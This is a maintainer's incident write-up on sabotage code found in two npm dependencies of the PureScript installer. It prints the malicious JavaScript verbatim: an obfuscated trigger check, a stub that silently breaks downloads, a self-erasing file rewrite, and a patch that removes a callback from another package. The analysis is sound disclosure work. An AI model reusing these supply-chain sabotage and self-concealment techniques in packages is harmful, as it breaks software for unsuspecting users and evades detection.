Malicious code in the PureScript npm installer

Earlier this week, I found and addressed some malicious code in the purescript npm installer. The malicious code was inserted into dependencies of the installer: specifically, packages maintained by @shinnn, the original author of the purescript npm installer, and also the maintainer (until around a month ago).

There’s some important background context I should explain first: after a few too many disagreements and unpleasant conversations with @shinnn about the maintenance of the purescript npm installer, we (the compiler maintainers) recently decided that it would be better if we maintained it ourselves, and asked him if he would transfer the purescript package on npm to us. He begrudgingly did so. The 0.13.2 PureScript compiler release, which we cut last week, is the first release of the compiler since we took over the purescript npm package.

Quick summary

update: npm have responded:

The maintainer of rate-map and load-from-cwd-or-npm has replied and informed us that they had not published the packages and feared that their account had been compromised.

We have removed rate-map@1.0.3 and load-from-cwd-or-npm@3.0.2 from the registry.

The maintainer also published install-purescript-cli@0.5.1, whose dependencies are pinned to load-from-cwd-or-npm@3.0.1 and rate-map@1.0.2. This was done to prevent purescript v0.12.x from installing malicious versions of load-from-cwd-or-npm and rate-map.

Where did the malicious code come from?

The code was inserted first into the npm package load-from-cwd-or-npm at version 3.0.2, and later into the npm package rate-map starting at version 1.0.3. A number of versions of both of these packages were published over the last few days, and many of them have now been unpublished. As far as I can tell the only remaining version of load-from-cwd-or-npm including any malicious code is 3.0.2, and the only remaining version of rate-map including any malicious code is version 1.0.3.

update: npm have now removed both load-from-cwd-or-npm@3.0.2 and rate-map@1.0.3 from the registry.

What did it do?

In short, the code sabotages the purescript npm installer to prevent the download from completing, making the installer hang during the “Check if a prebuilt binary is provided for your platform” step. The first exploit did this by breaking the load-from-cwd-or-npm package so that any call to loadFromCwdOrNpm() would return a PassThrough stream instead of the package we were expecting (in this case, the request package, which we were using for downloading compiler binaries). The second iteration of the exploit did this by modifying a source file to prevent a download callback from firing. I’ve gone into more detail at the bottom of the post.

Timeline

This is my current understanding of what happened:

How has this been addressed?

In the purescript-installer package, we have dropped all dependencies which are maintained by @shinnn as of v0.2.5. We have also marked all earlier versions of purescript-installer as deprecated.

If you install the purescript npm package at any version before 0.13.2, you will still be pulling in packages maintained by @shinnn. I’d suggest updating as soon as possible, or if you are still using 0.12.x, installing via some other means. We are currently in discussion with npm’s security team to discuss how best to resolve the issue of previous versions of the purescript package.

How did the exploits work?

I’ve archived complete copies of the packages I’ve identified including the malicious code in a gist.

Exploit version 1: load-from-cwd-or-npm

The first version of the exploit, in load-from-cwd-or-npm@3.0.2, occurs in lines 50 to 83 of index.js:

  const tasks = [PassThrough];

  if (argLen === 2) {
    if (typeof args[1] !== 'function') {
      throw new TypeError(`Expected a function to compare two package versions, but got ${
        inspectWithKind(args[1])
      }.`);
    }
  } else {
    tasks.unshift(resolveSemverFromNpm);
  }

  tasks.unshift(resolveFromNpm(modulePkgId));

  try {
    const results = await Promise.all(tasks);
    let parent = module;

    do {
      parent = parent.parent;

      try {
        const {path} = parent;

        if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
          parent = 'npm';
          break;
        }
      } catch (_) {}
    } while (parent);

    if (typeof parent !== 'string') {
      return results[2];
    }

This code is a little obfuscated but it didn’t take too long for me to work out what it is doing.

The tasks array initially contains just the PassThrough stream constructor. The code then calls tasks.unshift twice so that the PassThrough constructor is at index 2 in the tasks array. This will be important later.

The first do-while loop works its way up the require chain to try to find out how the code is being run, by recursively inspecting the parent property of each module in the chain. Then, we have this condition:

    if (
      path.endsWith("cli") ||
      [path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
    )

The purpose of this condition appears to be to decide whether or not to activate the malicious code. As far as I can tell, the path.endsWith("cli") condition is designed to evaluate to true on older versions of the purescript npm installer; before we took over, the purescript npm package depended on the install-purescript-cli package, which is maintained by @shinnn; in the most recent version of purescript, this dependency has been replaced with the purescript-installer package, which we maintain. So the purpose of this condition seems to be to ensure that the malicious code only runs when our installer is being used (and not @shinnn’s).

The second condition is checking whether there is a .git directory alongside the file. The purpose of this is presumably to avoid activating the malicious code when the installer is being run out of a git working directory, to make it harder to reproduce and track down.

The purpose of the parent variable at this stage is just to indicate whether the malicious code should run or not: if the exploit should be run, then parent will be undefined, but if it shouldn’t, then it will be set to the string "npm". We then have this if statement:

    if (typeof parent !== 'string') {
      return results[2];
    }

which just returns the PassThrough constructor in the case where the malicious code is being run; note that there are no other references to results[2] in the source file.

The effect of this is that when we do loadFromCwdOrNpm("request"), we get the PassThrough constructor. So when we have code along the lines of

const request = loadFromCwdOrNpm("request");
request("https://github.com/.../archive.tar.gz").pipe(...);

nothing happens; no HTTP request is performed.

Exploit version 2: rate-map

rate-map@1.0.3 includes the same do-while loop to control whether or not the exploit runs, although it also includes some interesting modifications.

let parent = module;
const {
  existsSync: existsSync,
  readFileSync: readFileSync,
  writeFileSync: writeFileSync
} = require("fs");
do {
  parent = parent.parent;
  try {
    const { path: path } = parent;
    if (
      path.endsWith("cli") ||
      [path, dirname(path)].some(dir => existsSync(resolve(dir, ".git")))
    ) {
      parent = "npm";
      break;
    }
  } catch (_) {}
} while (parent);
if (typeof parent !== "string") {
  const px = require.resolve(
    Buffer.from([100, 108, 45, 116, 97, 114]).toString()
  );
  try {
    writeFileSync(
      __filename,
      readFileSync(__filename, "utf8").replace(
        /let parent[^\0]*module\.exports/u,
        "module.exports"
      )
    );
  } catch (_) {}
  try {
    writeFileSync(
      px,
      readFileSync(px, "utf8").replace(/\n\s*cb\(null, chunk\);/u, "")
    );
  } catch (_) {}
}

After the do-while loop, in the case where the exploit code is going to run, it first resolves the path of the dl-tar package on the local filesystem; note the use of Buffer.from to obscure this:

> Buffer.from([100, 108, 45, 116, 97, 114]).toString()
'dl-tar'

The file path of index.js from the dl-tar package will now be stored in the px variable. Then, we have this:

  try {
    writeFileSync(
      __filename,
      readFileSync(__filename, "utf8").replace(
        /let parent[^\0]*module\.exports/u,
        "module.exports"
      )
    );
  } catch (_) {}

which rewrites the current file to remove the malicious code, presumably also in order to make this exploit harder to track down. Finally, we have this:

  try {
    writeFileSync(
      px,
      readFileSync(px, "utf8").replace(/\n\s*cb\(null, chunk\);/u, "")
    );
  } catch (_) {}

which replaces any lines in dl-tar’s index.js file which match the regular expression /\n\s*cb\(null, chunk\);/ with empty strings. When running this code against dl-tar@0.8.0, the latest version at the time of writing, it produces the following diff:

--- a/home/harry/code/purescript-npm-installer/dl-tar/index.js
+++ b/node_modules/purescript-installer/dl-tar/index.js
@@ -205,6 +205,7 @@ module.exports = function dlTar(...args) {
   new Transform({
     transform(chunk, encoding, cb) {
       unpackStream.responseBytes += chunk.length;
-      cb(null, chunk);
     }
   }),
   unpackStream

that is, it removes the call to cb, which means that the subscribers to dlTar won’t fire.